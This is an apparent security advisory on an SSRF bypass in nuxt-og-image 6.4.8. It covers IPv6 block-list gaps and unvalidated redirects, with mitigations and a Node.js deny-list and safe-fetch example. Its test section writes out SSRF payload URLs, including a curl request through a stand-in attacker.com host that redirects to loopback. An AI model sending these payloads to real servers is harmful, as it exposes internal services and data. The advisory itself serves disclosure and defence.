Nuxt OG Image, SSRF Bypass, GHSA-pqhr-mp3f-hrpp (Critical)


How the vulnerability works:

The fix for GHSA-pqhr-mp3f-hrpp (released as [email protected]) tried to block requests to internal IP addresses in isBlockedUrl(). That fix is incomplete, and the latest release, 6.4.8, is still affected. Two independent bypasses exist:
1. Incomplete IPv6 prefix list – the validator only blocks `::1` and the string prefixes `fc`, `fd` and `fe80`. It misses the following ranges:
– `[::ffff:7f00:1]` – IPv4‑mapped IPv6 loopback in hexadecimal form (the same address as `::ffff:127.0.0.1`; it reaches 127.0.0.1).
– `[fec0::/10]` – RFC 3879 site‑local (deprecated, but still routable where a host configures it).
– `[5f00::/16]` – RFC 9602 SRv6 SIDs.
– `[3fff::/20]` – RFC 9637 IPv6 documentation range.
– `[64:ff9b:1::/48]` – RFC 8215 local‑use NAT64 prefix, whose low 32 bits embed an IPv4 address, loopback included.
2. No redirect re‑validation – `isBlockedUrl()` runs only on the initial `<img src>` URL. The subsequent `$fetch()` follows 30x redirects by default (ofetch passes the fetch default `redirect: "follow"` through) without checking the destination. An attacker‑controlled CDN or S3 redirect rule can answer with a 302 to `http://127.0.0.1/`, completing the SSRF.
The vulnerable code lives in dist/runtime/server/og-image/core/plugins/imageSrc.js. It uses a hand‑rolled IPv6 prefix list and does not re‑validate after redirects. Empirical tests confirm that `[::ffff:7f00:1]` reaches loopback on IPv4‑only hosts and that a 302 to an internal IP succeeds.
DailyCVE form:
Platform: Nuxt nuxt-og-image
Version: 6.4.8 (latest)
Vulnerability: SSRF bypass
Severity: Critical
Date: 2026-05-08
Prediction: 2026-05-22

What Undercode Says:

Test the IPv6‑mapped loopback bypass:
  curl -v "http://target/og?img=http://[::ffff:7f00:1]:8765/secret"
Test the redirect amplifier (attacker.com answers with a 302 to 127.0.0.1):
  curl -v "http://target/og?img=http://attacker.com/redirect-to-127.0.0.1"
Confirm that ofetch follows redirects by default (single quotes keep the shell from expanding `$fetch` to an empty string):
  node -e 'import("ofetch").then(({ $fetch }) => $fetch("http://lab.menna.website/test/redirect-to-loopback", { responseType: "arrayBuffer" }).then((b) => console.log("followed, got", b.byteLength, "bytes")).catch((e) => console.log(e)))'

Exploit:
The attacker supplies a crafted URL through an OG image parameter (e.g., ?avatar=). If the URL is an IPv6‑mapped loopback literal such as `http://[::ffff:7f00:1]:8080/admin`, or points at a 302 endpoint that redirects to 127.0.0.1, the Nuxt server fetches the internal resource and embeds its response (bytes, HTML, JSON) into the generated OG image, exfiltrating sensitive data.

Protection from this vulnerability:

  • Replace the hand‑rolled IPv6 checks with `ipaddr.js` (or any parser that normalises the literal to its 16‑byte form) and explicitly deny fec0::/10, 5f00::/16, 3fff::/20 and 64:ff9b:1::/48.
  • Widen `RE_MAPPED_V4` so that it matches the hexadecimal form `::ffff:7f00:1` as well as the dotted‑quad form `::ffff:127.0.0.1`, and run the extracted IPv4 address through the IPv4 deny list.
  • Use `redirect: "manual"` in `$fetch` and reject any 3xx response (or, if redirects must be followed, re‑run the check on every `Location` before fetching it).
  • Pin the resolved IP with a custom `undici.Agent` (connect‑time lookup) so the check applies to the address actually connected to on every hop; this also closes the DNS‑rebinding window between check and connection.
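The two bypasses described above (the hexadecimal mapped‑loopback form and the unvalidated redirect) and the first three items of this list, worked through as an added Node.js example that is not nuxt-og-image's code. The names `parseV4`, `parseV6`, `toBytes`, `isBlockedAddress`, `isBlockedUrl` and `fetchImageSafely` are chosen here; the deny list is the page's missing ranges plus the standard private, loopback, link‑local and multicast ranges (each marked in the comments); a hand‑written 16‑byte expansion stands in for `ipaddr.js` so that the example needs no package, and the fetch wrapper takes the fetch function as a parameter so it can be exercised offline.

```javascript
// Added example, not nuxt-og-image's code: isBlockedUrl() rebuilt on the 16-byte
// form of the address instead of string prefixes, plus a fetch wrapper that
// validates every redirect hop. Names that are not IP literals pass this check.

function parseV4(s) {
  const parts = s.split('.');
  if (parts.length !== 4) return null;
  const bytes = parts.map((p) => (/^\d{1,3}$/.test(p) ? Number(p) : 256));
  return bytes.some((b) => b > 255) ? null : bytes;
}

// Expand an IPv6 literal to 16 bytes: "::", an embedded dotted quad and a zone id.
function parseV6(s) {
  s = s.split('%')[0];
  if (s.includes('.')) {
    const cut = s.lastIndexOf(':');
    const v4 = parseV4(s.slice(cut + 1));
    if (!v4) return null;
    // rewrite the dotted quad as two hex groups; the rest is then plain IPv6
    s = s.slice(0, cut + 1) + ((v4[0] << 8) | v4[1]).toString(16) + ':' + ((v4[2] << 8) | v4[3]).toString(16);
  }
  const halves = s.split('::');
  if (halves.length > 2) return null;
  const groups = (part) => (part === '' ? [] : part.split(':'));
  const head = groups(halves[0]);
  const tail = halves.length === 2 ? groups(halves[1]) : [];
  const missing = 8 - head.length - tail.length;
  if (halves.length === 2 ? missing < 1 : missing !== 0) return null;
  const bytes = [];
  for (const g of [...head, ...Array(missing).fill('0'), ...tail]) {
    if (!/^[0-9a-f]{1,4}$/i.test(g)) return null;
    const n = parseInt(g, 16);
    bytes.push(n >> 8, n & 0xff);
  }
  return bytes;
}

// Any literal as 16 bytes; plain IPv4 goes into the ::ffff:0:0/96 mapped space,
// so one table covers 127.0.0.1, ::ffff:7f00:1 and ::ffff:127.0.0.1 alike.
function toBytes(host) {
  const v4 = parseV4(host);
  if (v4) return [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0xff, 0xff, ...v4];
  return host.includes(':') ? parseV6(host) : null;
}

// [literal, prefix length]; IPv4 lengths are shifted by 96 into the mapped space.
const BLOCKED = [
  ['0.0.0.0', 8], ['10.0.0.0', 8], ['100.64.0.0', 10], ['127.0.0.0', 8],
  ['169.254.0.0', 16], ['172.16.0.0', 12], ['192.168.0.0', 16], ['224.0.0.0', 3],
  ['::', 96],           // unspecified, ::1 loopback, deprecated IPv4-compatible
  ['64:ff9b::', 96],    // RFC 6052 well-known NAT64 prefix (not in the page's list)
  ['64:ff9b:1::', 48],  // RFC 8215 local-use NAT64
  ['100::', 64],        // RFC 6666 discard-only
  ['2001:db8::', 32],   // RFC 3849 documentation
  ['3fff::', 20],       // RFC 9637 documentation
  ['5f00::', 16],       // RFC 9602 SRv6 SIDs
  ['fc00::', 7],        // RFC 4193 ULA (covers the fc and fd prefixes)
  ['fe80::', 10],       // link-local
  ['fec0::', 10],       // RFC 3879 site-local (deprecated)
  ['ff00::', 8],        // multicast
].map(([lit, bits]) => ({ bytes: toBytes(lit), bits: lit.includes(':') ? bits : bits + 96 }));

function inPrefix(addr, { bytes, bits }) {
  const full = bits >> 3;
  for (let i = 0; i < full; i++) if (addr[i] !== bytes[i]) return false;
  const rem = bits & 7;
  if (rem === 0) return true;
  const mask = (0xff << (8 - rem)) & 0xff;
  return (addr[full] & mask) === (bytes[full] & mask);
}

// True for an IP literal (brackets allowed) in a blocked range. Names return false:
// resolve them and pass each returned address back through this function.
function isBlockedAddress(host) {
  const bytes = toBytes(host.replace(/^\[|\]$/g, ''));
  return bytes !== null && BLOCKED.some((p) => inPrefix(bytes, p));
}

function isBlockedUrl(input) {
  let url;
  try { url = new URL(input); } catch { return true; }
  if (url.protocol !== 'http:' && url.protocol !== 'https:') return true;
  // WHATWG parsing has already canonicalised 0x7f000001, 2130706433 and 127.1
  return isBlockedAddress(url.hostname);
}

// redirect: "manual" so no hop is followed silently. The default rejects every 3xx
// (the page's advice); followRedirects re-validates each Location before fetching it.
async function fetchImageSafely(input, { fetchImpl = globalThis.fetch, followRedirects = false, maxHops = 3 } = {}) {
  let current = input;
  for (let hop = 0; hop <= maxHops; hop++) {
    if (isBlockedUrl(current)) throw new Error(`blocked: ${current}`);
    const res = await fetchImpl(current, { redirect: 'manual' });
    if (res.status < 300 || res.status >= 400) return res;
    const location = res.headers.get('location');
    if (!followRedirects || !location) throw new Error(`redirect rejected: ${current}`);
    current = new URL(location, current).href; // a relative Location resolves against this hop
  }
  throw new Error(`too many redirects: ${input}`);
}

for (const u of ['http://[::ffff:7f00:1]:8765/secret', 'http://[fec0::1]/', 'http://[64:ff9b:1::7f00:1]/', 'http://0x7f000001/', 'https://example.com/avatar.png'])
  console.log(isBlockedUrl(u), u); // true for every line but the last
```

Names that are not literals pass `isBlockedUrl()` by design; the fourth item of the list (DNS pinning) is the missing piece: resolve the name, run every returned address through `isBlockedAddress()`, and connect to that exact address rather than letting the HTTP client resolve again, otherwise a rebinding DNS answer can swap in 127.0.0.1 between the check and the connection.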

Impact:

SSRF allows reading loopback services (admin dashboards, internal APIs), cloud metadata endpoints (AWS IMDSv1 answers a plain GET; IMDSv2 first requires a PUT to obtain a session token, which this GET‑only image fetch cannot issue), scanning internal networks, and reaching NAT64/SRv6 addresses. In self‑hosted Nuxt deployments, any process bound to `127.0.0.1` (Redis UI, HTTP‑RPC, memcached) can be leaked as part of the rendered OG image. The module is widely used, so many production Nuxt apps that render OG images on the server are exposed.


Sources:

Reported By: github.com